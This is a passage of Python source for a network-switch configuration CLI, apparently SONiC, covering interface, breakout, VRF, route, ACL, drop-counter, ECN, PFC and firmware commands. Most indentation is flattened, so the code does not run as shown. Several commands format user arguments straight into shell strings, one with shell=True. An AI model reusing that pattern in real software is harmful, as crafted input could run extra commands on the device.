interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
intf_fs = parse_interface_in_filter(interface_name)
if len(intf_fs) > 1 and multi_asic.is_multi_asic():
ctx.fail("Interface range not supported in multi-asic platforms !!")
if len(intf_fs) == 1 and interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
port_dict = config_db.get_table('PORT')
for port_name in port_dict.keys():
if port_name in intf_fs:
config_db.mod_entry("PORT", port_name, {"admin_status": "down"})
portchannel_list = config_db.get_table("PORTCHANNEL")
for po_name in portchannel_list.keys():
if po_name in intf_fs:
config_db.mod_entry("PORTCHANNEL", po_name, {"admin_status": "down"})
subport_list = config_db.get_table("VLAN_SUB_INTERFACE")
for sp_name in subport_list.keys():
if sp_name in intf_fs:
config_db.mod_entry("VLAN_SUB_INTERFACE", sp_name, {"admin_status": "down"})
#
# 'speed' subcommand
#
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_speed', metavar='<interface_speed>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def speed(ctx, interface_name, interface_speed, verbose):
"""Set interface speed"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
log.log_info("'interface speed {} {}' executing...".format(interface_name, interface_speed))
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -s {}".format(interface_name, interface_speed)
else:
command = "portconfig -p {} -s {} -n {}".format(interface_name, interface_speed, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'breakout' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('mode', required=True, type=click.STRING, autocompletion=_get_breakout_options)
@click.option('-f', '--force-remove-dependencies', is_flag=True, help='Clear all dependencies internally first.')
@click.option('-l', '--load-predefined-config', is_flag=True, help='load predefined user configuration (alias, lanes, speed, etc.) first.')
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false, expose_value=False, prompt='Do you want to Breakout the port, continue?')
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
@click.pass_context
def breakout(ctx, interface_name, mode, verbose, force_remove_dependencies, load_predefined_config):
""" Set interface breakout mode """
breakout_cfg_file = device_info.get_path_to_port_config_file()
if not os.path.isfile(breakout_cfg_file) or not breakout_cfg_file.endswith('.json'):
click.secho("[ERROR] Breakout feature is not available without platform.json file", fg='red')
raise click.Abort()
# Get the config_db connector
config_db = ctx.obj['config_db']
target_brkout_mode = mode
# Get current breakout mode
cur_brkout_dict = config_db.get_table('BREAKOUT_CFG')
cur_brkout_mode = cur_brkout_dict[interface_name]["brkout_mode"]
# Validate Interface and Breakout mode
if not _validate_interface_mode(ctx, breakout_cfg_file, interface_name, mode, cur_brkout_mode):
raise click.Abort()
""" Interface Deletion Logic """
# Get list of interfaces to be deleted
del_ports = get_child_ports(interface_name, cur_brkout_mode, breakout_cfg_file)
del_intf_dict = {intf: del_ports[intf]["speed"] for intf in del_ports}
if del_intf_dict:
""" shut down all the interface before deletion """
ret = shutdown_interfaces(ctx, del_intf_dict)
if not ret:
raise click.Abort()
click.echo("\nPorts to be deleted : \n {}".format(json.dumps(del_intf_dict, indent=4)))
else:
click.secho("[ERROR] del_intf_dict is None! No interfaces are there to be deleted", fg='red')
raise click.Abort()
""" Interface Addition Logic """
# Get list of interfaces to be added
add_ports = get_child_ports(interface_name, target_brkout_mode, breakout_cfg_file)
add_intf_dict = {intf: add_ports[intf]["speed"] for intf in add_ports}
if add_intf_dict:
click.echo("Ports to be added : \n {}".format(json.dumps(add_intf_dict, indent=4)))
else:
click.secho("[ERROR] port_dict is None!", fg='red')
raise click.Abort()
""" Special Case: Dont delete those ports where the current mode and speed of the parent port
remains unchanged to limit the traffic impact """
click.secho("\nAfter running Logic to limit the impact", fg="cyan", underline=True)
matched_item = [intf for intf, speed in del_intf_dict.items() if intf in add_intf_dict.keys() and speed == add_intf_dict[intf]]
# Remove the interface which remains unchanged from both del_intf_dict and add_intf_dict
# map() is lazy in Python 3, so use an explicit loop to actually remove the unchanged ports.
for intf in matched_item:
    del_intf_dict.pop(intf)
    add_intf_dict.pop(intf)
click.secho("\nFinal list of ports to be deleted : \n {} \nFinal list of ports to be added : \n {}".format(json.dumps(del_intf_dict, indent=4), json.dumps(add_intf_dict, indent=4), fg='green', blink=True))
if len(add_intf_dict.keys()) == 0:
click.secho("[ERROR] add_intf_dict is None! No interfaces are there to be added", fg='red')
raise click.Abort()
port_dict = {}
for intf in add_intf_dict:
if intf in add_ports.keys():
port_dict[intf] = add_ports[intf]
# writing JSON object
with open('new_port_config.json', 'w') as f:
json.dump(port_dict, f, indent=4)
# Start interaction with Dynamic Port Breakout config management
try:
""" Load config for the commands which are capable of change in config DB """
cm = load_ConfigMgmt(verbose)
""" Delete all ports if forced else print dependencies using ConfigMgmt API """
final_delPorts = [intf for intf in del_intf_dict.keys()]
""" Warn user if tables without yang models exist and have final_delPorts """
breakout_warnUser_extraTables(cm, final_delPorts, confirm=True)
# Create a dictionary containing all the added ports with its capabilities like alias, lanes, speed etc.
portJson = dict(); portJson['PORT'] = port_dict
# breakout_Ports will abort operation on failure, So no need to check return
breakout_Ports(cm, delPorts=final_delPorts, portJson=portJson, force=force_remove_dependencies, \
loadDefConfig=load_predefined_config, verbose=verbose)
# Set Current Breakout mode in config DB
brkout_cfg_keys = config_db.get_keys('BREAKOUT_CFG')
if interface_name.decode("utf-8") not in brkout_cfg_keys:
click.secho("[ERROR] {} is not present in 'BREAKOUT_CFG' Table!".\
format(interface_name), fg='red')
raise click.Abort()
config_db.set_entry("BREAKOUT_CFG", interface_name,\
{'brkout_mode': target_brkout_mode})
click.secho("Breakout process got successfully completed.".\
format(interface_name), fg="cyan", underline=True)
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
except Exception as e:
click.secho("Failed to break out Port. Error: {}".format(str(e)), \
fg='magenta')
# Exit non-zero so callers can detect the failed breakout.
sys.exit(1)
def _get_all_mgmtinterface_keys():
"""Returns list of strings containing mgmt interface keys
"""
config_db = ConfigDBConnector()
config_db.connect()
return config_db.get_table('MGMT_INTERFACE').keys()
def mgmt_ip_restart_services():
"""Restart the required services when mgmt inteface IP address is changed"""
"""
Whenever the eth0 IP address is changed, restart the "interfaces-config"
service which regenerates the /etc/network/interfaces file and restarts
the networking service to make the new/null IP address effective for eth0.
"ntp-config" service should also be restarted based on the new
eth0 IP address since the ntp.conf (generated from ntp.conf.j2) is
made to listen on that particular eth0 IP address or reset it back.
"""
cmd="systemctl restart interfaces-config"
os.system (cmd)
cmd="systemctl restart ntp-config"
os.system (cmd)
#
# 'mtu' subcommand
#
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_mtu', metavar='<interface_mtu>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def mtu(ctx, interface_name, interface_mtu, verbose):
"""Set interface mtu"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -m {}".format(interface_name, interface_mtu)
else:
command = "portconfig -p {} -m {} -n {}".format(interface_name, interface_mtu, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_fec', metavar='<interface_fec>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def fec(ctx, interface_name, interface_fec, verbose):
"""Set interface fec"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if interface_fec not in ["rs", "fc", "none"]:
ctx.fail("'fec not in ['rs', 'fc', 'none']!")
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -f {}".format(interface_name, interface_fec)
else:
command = "portconfig -p {} -f {} -n {}".format(interface_name, interface_fec, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'ip' subgroup ('config interface ip ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def ip(ctx):
"""Add or remove IP address"""
pass
#
# 'add' subcommand
#
@ip.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument("ip_addr", metavar="<ip_addr>", required=True)
@click.argument('gw', metavar='<default gateway IP address>', required=False)
@click.pass_context
def add(ctx, interface_name, ip_addr, gw):
"""Add an IP address towards the interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
try:
net = ipaddress.ip_network(unicode(ip_addr), strict=False)
if '/' not in ip_addr:
ip_addr = str(net)
if interface_name == 'eth0':
# Configuring more than one IPv4 or more than one IPv6 address fails.
# Allow only one IPv4 address and one IPv6 address to be configured on eth0.
# If a row already exists, overwrite it (by doing delete and add).
mgmtintf_key_list = _get_all_mgmtinterface_keys()
for key in mgmtintf_key_list:
# For loop runs for max 2 rows, once for IPv4 and once for IPv6.
# No need to capture the exception since the ip_addr is already validated earlier
ip_input = ipaddress.ip_interface(ip_addr)
current_ip = ipaddress.ip_interface(key[1])
if (ip_input.version == current_ip.version):
# If the user configured an IPv4/IPv6 address and the existing row has the same IP version, delete the old row here.
config_db.set_entry("MGMT_INTERFACE", ("eth0", key[1]), None)
# Set the new row with new value
if not gw:
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), {"NULL": "NULL"})
else:
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), {"gwaddr": gw})
mgmt_ip_restart_services()
return
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
interface_entry = config_db.get_entry(table_name, interface_name)
if len(interface_entry) == 0:
if table_name == "VLAN_SUB_INTERFACE":
config_db.set_entry(table_name, interface_name, {"admin_status": "up"})
else:
config_db.set_entry(table_name, interface_name, {"NULL": "NULL"})
config_db.set_entry(table_name, (interface_name, ip_addr), {"NULL": "NULL"})
except ValueError:
ctx.fail("'ip_addr' is not valid.")
#
# 'del' subcommand
#
@ip.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument("ip_addr", metavar="<ip_addr>", required=True)
@click.pass_context
def remove(ctx, interface_name, ip_addr):
"""Remove an IP address from the interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
try:
net = ipaddress.ip_network(unicode(ip_addr), strict=False)
if '/' not in ip_addr:
ip_addr = str(net)
if interface_name == 'eth0':
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), None)
mgmt_ip_restart_services()
return
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
config_db.set_entry(table_name, (interface_name, ip_addr), None)
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
if len(interface_dependent) == 0 and is_interface_bind_to_vrf(config_db, interface_name) is False:
config_db.set_entry(table_name, interface_name, None)
if multi_asic.is_multi_asic():
command = "sudo ip netns exec {} ip neigh flush dev {} {}".format(ctx.obj['namespace'], interface_name, ip_addr)
else:
command = "ip neigh flush dev {} {}".format(interface_name, ip_addr)
clicommon.run_command(command)
except ValueError:
ctx.fail("'ip_addr' is not valid.")
#
# 'transceiver' subgroup ('config interface transceiver ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def transceiver(ctx):
"""SFP transceiver configuration"""
pass
#
# 'lpmode' subcommand ('config interface transceiver lpmode ...')
#
@transceiver.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('state', metavar='(enable|disable)', type=click.Choice(['enable', 'disable']))
@click.pass_context
def lpmode(ctx, interface_name, state):
"""Enable/disable low-power mode for SFP transceiver module"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
cmd = "sudo sfputil lpmode {} {}".format("on" if state == "enable" else "off", interface_name)
clicommon.run_command(cmd)
#
# 'reset' subcommand ('config interface transceiver reset ...')
#
@transceiver.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def reset(ctx, interface_name):
"""Reset SFP transceiver module"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
cmd = "sudo sfputil reset {}".format(interface_name)
clicommon.run_command(cmd)
#
# 'vrf' subgroup ('config interface vrf ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def vrf(ctx):
"""Bind or unbind VRF"""
pass
#
# 'bind' subcommand
#
@vrf.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def bind(ctx, interface_name, vrf_name):
"""Bind the interface to VRF"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
if is_interface_bind_to_vrf(config_db, interface_name) is True and \
config_db.get_entry(table_name, interface_name).get('vrf_name') == vrf_name:
return
# Clean ip addresses if interface configured
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
# When config_db deletes an entry and then adds one with the same key, the delete can be lost,
# so wait for the STATE_DB entry to disappear before re-adding the interface below.
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
state_db = SonicV2Connector(use_unix_socket_path=True)
else:
state_db = SonicV2Connector(use_unix_socket_path=True, namespace=ctx.obj['namespace'])
state_db.connect(state_db.STATE_DB, False)
_hash = '{}{}'.format('INTERFACE_TABLE|', interface_name)
while state_db.get_all(state_db.STATE_DB, _hash) is not None:
time.sleep(0.01)
state_db.close(state_db.STATE_DB)
config_db.set_entry(table_name, interface_name, {"vrf_name": vrf_name})
#
# 'unbind' subcommand
#
@vrf.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def unbind(ctx, interface_name):
"""Unbind the interface to VRF"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("interface is None!")
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
if is_interface_bind_to_vrf(config_db, interface_name) is False:
return
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
#
# 'vrf' group ('config vrf ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='vrf')
@click.pass_context
def vrf(ctx):
"""VRF-related configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {}
ctx.obj['config_db'] = config_db
@vrf.command('add')
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def add_vrf(ctx, vrf_name):
"""Add vrf"""
config_db = ctx.obj['config_db']
if not vrf_name.startswith("Vrf") and not (vrf_name == 'mgmt') and not (vrf_name == 'management'):
ctx.fail("'vrf_name' is not start with Vrf, mgmt or management!")
if len(vrf_name) > 15:
ctx.fail("'vrf_name' is too long!")
if (vrf_name == 'mgmt' or vrf_name == 'management'):
vrf_add_management_vrf(config_db)
else:
config_db.set_entry('VRF', vrf_name, {"NULL": "NULL"})
@vrf.command('del')
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def del_vrf(ctx, vrf_name):
"""Del vrf"""
config_db = ctx.obj['config_db']
if not vrf_name.startswith("Vrf") and not (vrf_name == 'mgmt') and not (vrf_name == 'management'):
ctx.fail("'vrf_name' is not start with Vrf, mgmt or management!")
if len(vrf_name) > 15:
ctx.fail("'vrf_name' is too long!")
if (vrf_name == 'mgmt' or vrf_name == 'management'):
vrf_delete_management_vrf(config_db)
else:
del_interface_bind_to_vrf(config_db, vrf_name)
config_db.set_entry('VRF', vrf_name, None)
#
# 'route' group ('config route ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def route(ctx):
"""route-related configuration tasks"""
pass
@route.command('add',context_settings={"ignore_unknown_options":True})
@click.argument('command_str', metavar='prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>', nargs=-1, type=click.Path())
@click.pass_context
def add_route(ctx, command_str):
"""Add route command"""
if len(command_str) < 4 or len(command_str) > 9:
ctx.fail("argument is not in pattern prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>!")
if "prefix" not in command_str:
ctx.fail("argument is incomplete, prefix not found!")
if "nexthop" not in command_str:
ctx.fail("argument is incomplete, nexthop not found!")
for i in range(0,len(command_str)):
if "nexthop" == command_str[i]:
prefix_str = command_str[:i]
nexthop_str = command_str[i:]
vrf_name = ""
cmd = 'sudo vtysh -c "configure terminal" -c "ip route'
if prefix_str:
if len(prefix_str) == 2:
prefix_mask = prefix_str[1]
cmd += ' {}'.format(prefix_mask)
elif len(prefix_str) == 4:
vrf_name = prefix_str[2]
prefix_mask = prefix_str[3]
cmd += ' {}'.format(prefix_mask)
else:
ctx.fail("prefix is not in pattern!")
if nexthop_str:
if len(nexthop_str) == 2:
ip = nexthop_str[1]
if vrf_name == "":
cmd += ' {}'.format(ip)
else:
cmd += ' {} vrf {}'.format(ip, vrf_name)
elif len(nexthop_str) == 3:
dev_name = nexthop_str[2]
if vrf_name == "":
cmd += ' {}'.format(dev_name)
else:
cmd += ' {} vrf {}'.format(dev_name, vrf_name)
elif len(nexthop_str) == 4:
vrf_name_dst = nexthop_str[2]
ip = nexthop_str[3]
if vrf_name == "":
cmd += ' {} nexthop-vrf {}'.format(ip, vrf_name_dst)
else:
cmd += ' {} vrf {} nexthop-vrf {}'.format(ip, vrf_name, vrf_name_dst)
else:
ctx.fail("nexthop is not in pattern!")
cmd += '"'
clicommon.run_command(cmd)
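# Illustrative (hypothetical) invocations of the command above, showing how the free-form
# argument list maps onto the generated vtysh command; addresses and VRF names are invented
# for the example:
#
#   config route add prefix 10.0.0.0/24 nexthop 192.168.1.1
#       -> sudo vtysh -c "configure terminal" -c "ip route 10.0.0.0/24 192.168.1.1"
#   config route add prefix vrf Vrf-red 10.0.0.0/24 nexthop vrf Vrf-blue 192.168.1.1
#       -> sudo vtysh -c "configure terminal" -c "ip route 10.0.0.0/24 192.168.1.1 vrf Vrf-red nexthop-vrf Vrf-blue"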
@route.command('del',context_settings={"ignore_unknown_options":True})
@click.argument('command_str', metavar='prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>', nargs=-1, type=click.Path())
@click.pass_context
def del_route(ctx, command_str):
"""Del route command"""
if len(command_str) < 4 or len(command_str) > 9:
ctx.fail("argument is not in pattern prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>!")
if "prefix" not in command_str:
ctx.fail("argument is incomplete, prefix not found!")
if "nexthop" not in command_str:
ctx.fail("argument is incomplete, nexthop not found!")
for i in range(0,len(command_str)):
if "nexthop" == command_str[i]:
prefix_str = command_str[:i]
nexthop_str = command_str[i:]
vrf_name = ""
cmd = 'sudo vtysh -c "configure terminal" -c "no ip route'
if prefix_str:
if len(prefix_str) == 2:
prefix_mask = prefix_str[1]
cmd += ' {}'.format(prefix_mask)
elif len(prefix_str) == 4:
vrf_name = prefix_str[2]
prefix_mask = prefix_str[3]
cmd += ' {}'.format(prefix_mask)
else:
ctx.fail("prefix is not in pattern!")
if nexthop_str:
if len(nexthop_str) == 2:
ip = nexthop_str[1]
if vrf_name == "":
cmd += ' {}'.format(ip)
else:
cmd += ' {} vrf {}'.format(ip, vrf_name)
elif len(nexthop_str) == 3:
dev_name = nexthop_str[2]
if vrf_name == "":
cmd += ' {}'.format(dev_name)
else:
cmd += ' {} vrf {}'.format(dev_name, vrf_name)
elif len(nexthop_str) == 4:
vrf_name_dst = nexthop_str[2]
ip = nexthop_str[3]
if vrf_name == "":
cmd += ' {} nexthop-vrf {}'.format(ip, vrf_name_dst)
else:
cmd += ' {} vrf {} nexthop-vrf {}'.format(ip, vrf_name, vrf_name_dst)
else:
ctx.fail("nexthop is not in pattern!")
cmd += '"'
clicommon.run_command(cmd)
#
# 'acl' group ('config acl ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def acl():
"""ACL-related configuration tasks"""
pass
#
# 'add' subgroup ('config acl add ...')
#
@acl.group(cls=clicommon.AbbreviationGroup)
def add():
"""
Add ACL configuration.
"""
pass
def get_acl_bound_ports():
config_db = ConfigDBConnector()
config_db.connect()
ports = set()
portchannel_members = set()
portchannel_member_dict = config_db.get_table("PORTCHANNEL_MEMBER")
for key in portchannel_member_dict:
ports.add(key[0])
portchannel_members.add(key[1])
port_dict = config_db.get_table("PORT")
for key in port_dict:
if key not in portchannel_members:
ports.add(key)
return list(ports)
#
# 'table' subcommand ('config acl add table ...')
#
@add.command()
@click.argument("table_name", metavar="<table_name>")
@click.argument("table_type", metavar="<table_type>")
@click.option("-d", "--description")
@click.option("-p", "--ports")
@click.option("-s", "--stage", type=click.Choice(["ingress", "egress"]), default="ingress")
def table(table_name, table_type, description, ports, stage):
"""
Add ACL table
"""
config_db = ConfigDBConnector()
config_db.connect()
table_info = {"type": table_type}
if description:
table_info["policy_desc"] = description
else:
table_info["policy_desc"] = table_name
if ports:
table_info["ports@"] = ports
else:
table_info["ports@"] = ",".join(get_acl_bound_ports())
table_info["stage"] = stage
config_db.set_entry("ACL_TABLE", table_name, table_info)
#
# 'remove' subgroup ('config acl remove ...')
#
@acl.group(cls=clicommon.AbbreviationGroup)
def remove():
"""
Remove ACL configuration.
"""
pass
#
# 'table' subcommand ('config acl remove table ...')
#
@remove.command()
@click.argument("table_name", metavar="<table_name>")
def table(table_name):
"""
Remove ACL table
"""
config_db = ConfigDBConnector()
config_db.connect()
config_db.set_entry("ACL_TABLE", table_name, None)
#
# 'acl update' group
#
@acl.group(cls=clicommon.AbbreviationGroup)
def update():
"""ACL-related configuration tasks"""
pass
#
# 'full' subcommand
#
@update.command()
@click.argument('file_name', required=True)
def full(file_name):
"""Full update of ACL rules configuration."""
log.log_info("'acl update full {}' executing...".format(file_name))
command = "acl-loader update full {}".format(file_name)
clicommon.run_command(command)
#
# 'incremental' subcommand
#
@update.command()
@click.argument('file_name', required=True)
def incremental(file_name):
"""Incremental update of ACL rule configuration."""
log.log_info("'acl update incremental {}' executing...".format(file_name))
command = "acl-loader update incremental {}".format(file_name)
clicommon.run_command(command)
#
# 'dropcounters' group ('config dropcounters ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def dropcounters():
"""Drop counter related configuration tasks"""
pass
#
# 'install' subcommand ('config dropcounters install')
#
@dropcounters.command()
@click.argument("counter_name", type=str, required=True)
@click.argument("counter_type", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option("-a", "--alias", type=str, help="Alias for this counter")
@click.option("-g", "--group", type=str, help="Group for this counter")
@click.option("-d", "--desc", type=str, help="Description for this counter")
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def install(counter_name, alias, group, counter_type, desc, reasons, verbose):
"""Install a new drop counter"""
command = "dropconfig -c install -n '{}' -t '{}' -r '{}'".format(counter_name, counter_type, reasons)
if alias:
command += " -a '{}'".format(alias)
if group:
command += " -g '{}'".format(group)
if desc:
command += " -d '{}'".format(desc)
clicommon.run_command(command, display_cmd=verbose)
#
# 'delete' subcommand ('config dropcounters delete')
#
@dropcounters.command()
@click.argument("counter_name", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def delete(counter_name, verbose):
"""Delete an existing drop counter"""
command = "dropconfig -c uninstall -n {}".format(counter_name)
clicommon.run_command(command, display_cmd=verbose)
#
# 'add_reasons' subcommand ('config dropcounters add_reasons')
#
@dropcounters.command('add-reasons')
@click.argument("counter_name", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def add_reasons(counter_name, reasons, verbose):
"""Add reasons to an existing drop counter"""
command = "dropconfig -c add -n {} -r {}".format(counter_name, reasons)
clicommon.run_command(command, display_cmd=verbose)
#
# 'remove_reasons' subcommand ('config dropcounters remove_reasons')
#
@dropcounters.command('remove-reasons')
@click.argument("counter_name", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def remove_reasons(counter_name, reasons, verbose):
"""Remove reasons from an existing drop counter"""
command = "dropconfig -c remove -n {} -r {}".format(counter_name, reasons)
clicommon.run_command(command, display_cmd=verbose)
#
# 'ecn' command ('config ecn ...')
#
@config.command()
@click.option('-profile', metavar='<profile_name>', type=str, required=True, help="Profile name")
@click.option('-rmax', metavar='<red threshold max>', type=int, help="Set red max threshold")
@click.option('-rmin', metavar='<red threshold min>', type=int, help="Set red min threshold")
@click.option('-ymax', metavar='<yellow threshold max>', type=int, help="Set yellow max threshold")
@click.option('-ymin', metavar='<yellow threshold min>', type=int, help="Set yellow min threshold")
@click.option('-gmax', metavar='<green threshold max>', type=int, help="Set green max threshold")
@click.option('-gmin', metavar='<green threshold min>', type=int, help="Set green min threshold")
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def ecn(profile, rmax, rmin, ymax, ymin, gmax, gmin, verbose):
"""ECN-related configuration tasks"""
log.log_info("'ecn -profile {}' executing...".format(profile))
command = "ecnconfig -p %s" % profile
if rmax is not None: command += " -rmax %d" % rmax
if rmin is not None: command += " -rmin %d" % rmin
if ymax is not None: command += " -ymax %d" % ymax
if ymin is not None: command += " -ymin %d" % ymin
if gmax is not None: command += " -gmax %d" % gmax
if gmin is not None: command += " -gmin %d" % gmin
if verbose: command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'pfc' group ('config interface pfc ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def pfc(ctx):
"""Set PFC configuration."""
pass
#
# 'pfc asymmetric' ('config interface pfc asymmetric ...')
#
@pfc.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('status', type=click.Choice(['on', 'off']))
@click.pass_context
def asymmetric(ctx, interface_name, status):
"""Set asymmetric PFC configuration."""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
clicommon.run_command("pfc config asymmetric {0} {1}".format(status, interface_name))
#
# 'pfc priority' command ('config interface pfc priority ...')
#
@pfc.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('priority', type=click.Choice([str(x) for x in range(8)]))
@click.argument('status', type=click.Choice(['on', 'off']))
@click.pass_context
def priority(ctx, interface_name, priority, status):
"""Set PFC priority configuration."""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
clicommon.run_command("pfc config priority {0} {1} {2}".format(status, interface_name, priority))
#
# 'platform' group ('config platform ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def platform():
"""Platform-related configuration tasks"""
# 'firmware' subgroup ("config platform firmware ...")
@platform.group(cls=clicommon.AbbreviationGroup)
def firmware():
"""Firmware configuration tasks"""
pass
# 'install' subcommand ("config platform firmware install")
@firmware.command(
context_settings=dict(
ignore_unknown_options=True,
allow_extra_args=True
),
add_help_option=False
)
@click.argument('args', nargs=-1, type=click.UNPROCESSED)
def install(args):
"""Install platform firmware"""
cmd = "fwutil install {}".format(" ".join(args))
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
sys.exit(e.returncode)
# 'update' subcommand ("config platform firmware update")
@firmware.command(
context_settings=dict(
ignore_unknown_options=True,
allow_extra_args=True
),
add_help_option=False
)
@click.argument('args', nargs=-1, type=click.UNPROCESSED)
def update(args):
"""Update platform firmware"""
cmd = "fwutil update {}".format(" ".join(args))
